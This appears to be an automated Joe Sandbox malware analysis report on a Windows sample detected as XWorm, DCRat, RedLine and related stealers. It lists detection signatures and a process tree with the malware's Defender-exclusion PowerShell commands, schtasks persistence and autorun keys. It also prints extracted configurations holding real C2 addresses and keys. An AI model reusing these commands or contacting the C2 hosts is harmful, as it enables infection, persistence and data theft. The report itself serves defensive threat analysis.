Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
HaLCYOFjMN.exe

Overview

General Information

Sample name:HaLCYOFjMN.exe
renamed because original name is a hash value
Original sample name:3c30d3b3706b97a2a0638180bb159b44.exe
Analysis ID:1585491
MD5:3c30d3b3706b97a2a0638180bb159b44
SHA1:eeb4a51ebfac2ba3a159f2b9ee1a4b1caef3b960
SHA256:7464ba97e34f2e95995d4a7a77e39409e57101d7ee156abf42f0b08deb192aa7
Tags:DCRatexeuser-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, RedLine, XWorm, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected RedLine Stealer
Yara detected Telegram RAT
Yara detected Telegram Recon
Yara detected XWorm
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Contains functionality to capture screen (.Net source)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Infects executable files (exe, dll, sys, html)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Reads the System eventlog
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Use Short Name Path in Command Line
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • HaLCYOFjMN.exe (PID: 720 cmdline: "C:\Users\user\Desktop\HaLCYOFjMN.exe" MD5: 3C30D3B3706B97A2A0638180BB159B44)
    • powershell.exe (PID: 6768 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HaLCYOFjMN.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7352 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'HaLCYOFjMN.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7692 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Update.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7912 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Update.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 5948 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Update" /tr "C:\Users\user\AppData\Roaming\Update.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 6080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • rqbprm.exe (PID: 1748 cmdline: "C:\Users\user\AppData\Local\Temp\rqbprm.exe" MD5: 693F4A6FC50DDA899DE3F006DE04951E)
      • wscript.exe (PID: 2092 cmdline: "C:\Windows\System32\WScript.exe" "C:\agentwebreviewDhcp\uk12ZF.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
        • cmd.exe (PID: 7644 cmdline: C:\Windows\system32\cmd.exe /c ""C:\agentwebreviewDhcp\fSi1yDkwZTtB7t90YnI.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • portBrowserweb.exe (PID: 7392 cmdline: "C:\agentwebreviewDhcp/portBrowserweb.exe" MD5: 943D7E982E4BAB5A7CA659DC390E9A79)
            • schtasks.exe (PID: 7480 cmdline: schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Mail\System.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 7360 cmdline: schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Program Files\Windows Mail\System.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 7512 cmdline: schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Mail\System.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • csc.exe (PID: 6408 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j2qo545d\j2qo545d.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
              • conhost.exe (PID: 6800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • cvtres.exe (PID: 7752 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES158C.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC2AA2F9313E4148E19DA14C63DF3823B.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
            • csc.exe (PID: 5808 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dqjfixj4\dqjfixj4.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
              • conhost.exe (PID: 7888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • cvtres.exe (PID: 7740 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES1BB6.tmp" "c:\Users\user\AppData\Roaming\CSC2223B829CAD74E6CA36F406352D1401D.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
            • csc.exe (PID: 7732 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\la3xll1v\la3xll1v.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
              • conhost.exe (PID: 7772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • cvtres.exe (PID: 7836 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES1F7E.tmp" "c:\Windows\System32\CSC13E65C595E5748469989E9DEA0292D89.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
            • schtasks.exe (PID: 7928 cmdline: schtasks.exe /create /tn "ybWXCCKXKhIvlNpBFy" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\ybWXCCKXKhIvlNpBF.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 4672 cmdline: schtasks.exe /create /tn "ybWXCCKXKhIvlNpBF" /sc ONLOGON /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\ybWXCCKXKhIvlNpBF.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 5720 cmdline: schtasks.exe /create /tn "ybWXCCKXKhIvlNpBFy" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\ybWXCCKXKhIvlNpBF.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 6548 cmdline: schtasks.exe /create /tn "ybWXCCKXKhIvlNpBFy" /sc MINUTE /mo 11 /tr "'C:\Users\user\Contacts\ybWXCCKXKhIvlNpBF.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 5076 cmdline: schtasks.exe /create /tn "ybWXCCKXKhIvlNpBF" /sc ONLOGON /tr "'C:\Users\user\Contacts\ybWXCCKXKhIvlNpBF.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 60 cmdline: schtasks.exe /create /tn "ybWXCCKXKhIvlNpBFy" /sc MINUTE /mo 7 /tr "'C:\Users\user\Contacts\ybWXCCKXKhIvlNpBF.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 7580 cmdline: schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 13 /tr "'C:\agentwebreviewDhcp\WmiPrvSE.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cnvwov.EXE (PID: 1860 cmdline: "C:\Users\user\AppData\Local\Temp\cnvwov.EXE" MD5: F50B390915773B882776BB3EF569C708)
      • conhost.exe (PID: 1268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • Update.exe (PID: 7188 cmdline: C:\Users\user\AppData\Roaming\Update.exe MD5: 3C30D3B3706B97A2A0638180BB159B44)
  • Update.exe (PID: 1516 cmdline: "C:\Users\user\AppData\Roaming\Update.exe" MD5: 3C30D3B3706B97A2A0638180BB159B44)
  • svchost.exe (PID: 7412 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • Update.exe (PID: 5820 cmdline: C:\Users\user\AppData\Roaming\Update.exe MD5: 3C30D3B3706B97A2A0638180BB159B44)
  • Update.exe (PID: 1416 cmdline: "C:\Users\user\AppData\Roaming\Update.exe" MD5: 3C30D3B3706B97A2A0638180BB159B44)
  • System.exe (PID: 348 cmdline: "C:\Program Files\Windows Mail\System.exe" MD5: 943D7E982E4BAB5A7CA659DC390E9A79)
  • System.exe (PID: 4196 cmdline: "C:\Program Files\Windows Mail\System.exe" MD5: 943D7E982E4BAB5A7CA659DC390E9A79)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: Xworm

{"C2 url": ["94.141.122.161"], "Port": 7000, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Threatname: DCRat

{"C2 url": "http://122295cm.n9shteam.in/topollgamelongpoll", "MUTEX": "DCR_MUTEX-ue3JZ8LnyDYDzLQZpNKo"}

Threatname: RedLine

{"C2 url": ["94.141.122.161:7771"], "Bot Id": "button1"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
HaLCYOFjMN.exeJoeSecurity_TelegramReconYara detected Telegram ReconJoe Security
    HaLCYOFjMN.exeJoeSecurity_XWormYara detected XWormJoe Security
      HaLCYOFjMN.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
        HaLCYOFjMN.exeJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          HaLCYOFjMN.exerat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
          • 0xd1bf:$str01: $VB$Local_Port
          • 0xd1ec:$str02: $VB$Local_Host
          • 0xb4b5:$str03: get_Jpeg
          • 0xbad1:$str04: get_ServicePack
          • 0xe5ef:$str05: Select * from AntivirusProduct
          • 0xeb0b:$str06: PCRestart
          • 0xeb1f:$str07: shutdown.exe /f /r /t 0
          • 0xebd1:$str08: StopReport
          • 0xeba7:$str09: StopDDos
          • 0xec9d:$str10: sendPlugin
          • 0xee1d:$str12: -ExecutionPolicy Bypass -File "
          • 0xf17c:$str13: Content-length: 5235
          Click to see the 1 entries

          PCAP (Network Traffic)

          SourceRuleDescriptionAuthorStrings
          sslproxydump.pcapJoeSecurity_XWorm_1Yara detected XWormJoe Security

            Dropped Files

            SourceRuleDescriptionAuthorStrings
            C:\Windows\SystemApps\Microsoft.Windows.AppResolverUX_cw5n1h2txyewy\pris\Idle.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
              C:\Windows\SystemApps\Microsoft.Windows.AppResolverUX_cw5n1h2txyewy\pris\Idle.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                C:\agentwebreviewDhcp\portBrowserweb.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                  C:\agentwebreviewDhcp\portBrowserweb.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    C:\Program Files (x86)\Mozilla Maintenance Service\logs\ybWXCCKXKhIvlNpBF.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                      Click to see the 9 entries

                      Memory Dumps

                      SourceRuleDescriptionAuthorStrings
                      00000005.00000000.1275401663.0000000000202000.00000002.00000001.01000000.00000004.sdmpJoeSecurity_XWormYara detected XWormJoe Security
                        00000005.00000000.1275401663.0000000000202000.00000002.00000001.01000000.00000004.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                          00000005.00000000.1275401663.0000000000202000.00000002.00000001.01000000.00000004.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                          • 0xe0c5:$s6: VirtualBox
                          • 0xe023:$s8: Win32_ComputerSystem
                          • 0xfd35:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                          • 0xfdd2:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                          • 0xfee7:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                          • 0xee97:$cnc4: POST / HTTP/1.1
                          00000005.00000002.2734936969.0000000002561000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
                            00000021.00000000.2338852988.00000000003E2000.00000002.00000001.01000000.00000014.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                              Click to see the 8 entries

                              Unpacked PEs

                              SourceRuleDescriptionAuthorStrings
                              5.0.HaLCYOFjMN.exe.200000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                                5.0.HaLCYOFjMN.exe.200000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                                  5.0.HaLCYOFjMN.exe.200000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                                    5.0.HaLCYOFjMN.exe.200000.0.unpackrat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
                                    • 0xd1bf:$str01: $VB$Local_Port
                                    • 0xd1ec:$str02: $VB$Local_Host
                                    • 0xb4b5:$str03: get_Jpeg
                                    • 0xbad1:$str04: get_ServicePack
                                    • 0xe5ef:$str05: Select * from AntivirusProduct
                                    • 0xeb0b:$str06: PCRestart
                                    • 0xeb1f:$str07: shutdown.exe /f /r /t 0
                                    • 0xebd1:$str08: StopReport
                                    • 0xeba7:$str09: StopDDos
                                    • 0xec9d:$str10: sendPlugin
                                    • 0xee1d:$str12: -ExecutionPolicy Bypass -File "
                                    • 0xf17c:$str13: Content-length: 5235
                                    5.0.HaLCYOFjMN.exe.200000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                                    • 0xe2c5:$s6: VirtualBox
                                    • 0xe223:$s8: Win32_ComputerSystem
                                    • 0xff35:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                                    • 0xffd2:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                                    • 0x100e7:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                                    • 0xf097:$cnc4: POST / HTTP/1.1
                                    Click to see the 10 entries

                                    Sigma Signatures

                                    System Summary

                                    barindex
                                    Sigma detected: Files With System Process Name In Unsuspected Locations
                                    Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\agentwebreviewDhcp\portBrowserweb.exe, ProcessId: 7392, TargetFilename: C:\agentwebreviewDhcp\WmiPrvSE.exe
                                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HaLCYOFjMN.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HaLCYOFjMN.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\HaLCYOFjMN.exe", ParentImage: C:\Users\user\Desktop\HaLCYOFjMN.exe, ParentProcessId: 720, ParentProcessName: HaLCYOFjMN.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HaLCYOFjMN.exe', ProcessId: 6768, ProcessName: powershell.exe
                                    Sigma detected: Change PowerShell Policies to an Insecure Level
                                    Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HaLCYOFjMN.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HaLCYOFjMN.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\HaLCYOFjMN.exe", ParentImage: C:\Users\user\Desktop\HaLCYOFjMN.exe, ParentProcessId: 720, ParentProcessName: HaLCYOFjMN.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HaLCYOFjMN.exe', ProcessId: 6768, ProcessName: powershell.exe
                                    Sigma detected: CurrentVersion Autorun Keys Modification
                                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\Update.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\HaLCYOFjMN.exe, ProcessId: 720, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update
                                    Sigma detected: CurrentVersion NT Autorun Keys Modification
                                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Program Files\Windows Mail\System.exe", EventID: 13, EventType: SetValue, Image: C:\agentwebreviewDhcp\portBrowserweb.exe, ProcessId: 7392, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
                                    Sigma detected: Dynamic .NET Compilation Via Csc.EXE
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j2qo545d\j2qo545d.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j2qo545d\j2qo545d.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\agentwebreviewDhcp/portBrowserweb.exe", ParentImage: C:\agentwebreviewDhcp\portBrowserweb.exe, ParentProcessId: 7392, ParentProcessName: portBrowserweb.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j2qo545d\j2qo545d.cmdline", ProcessId: 6408, ProcessName: csc.exe
                                    Sigma detected: Powershell Defender Exclusion
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HaLCYOFjMN.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HaLCYOFjMN.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\HaLCYOFjMN.exe", ParentImage: C:\Users\user\Desktop\HaLCYOFjMN.exe, ParentProcessId: 720, ParentProcessName: HaLCYOFjMN.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HaLCYOFjMN.exe', ProcessId: 6768, ProcessName: powershell.exe
                                    Sigma detected: Suspicious Schtasks From Env Var Folder
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Update" /tr "C:\Users\user\AppData\Roaming\Update.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Update" /tr "C:\Users\user\AppData\Roaming\Update.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\HaLCYOFjMN.exe", ParentImage: C:\Users\user\Desktop\HaLCYOFjMN.exe, ParentProcessId: 720, ParentProcessName: HaLCYOFjMN.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Update" /tr "C:\Users\user\AppData\Roaming\Update.exe", ProcessId: 5948, ProcessName: schtasks.exe
                                    Sigma detected: Use Short Name Path in Command Line
                                    Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES158C.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC2AA2F9313E4148E19DA14C63DF3823B.TMP", CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES158C.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC2AA2F9313E4148E19DA14C63DF3823B.TMP", CommandLine|base64offset|contains: 8c, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j2qo545d\j2qo545d.cmdline", ParentImage: 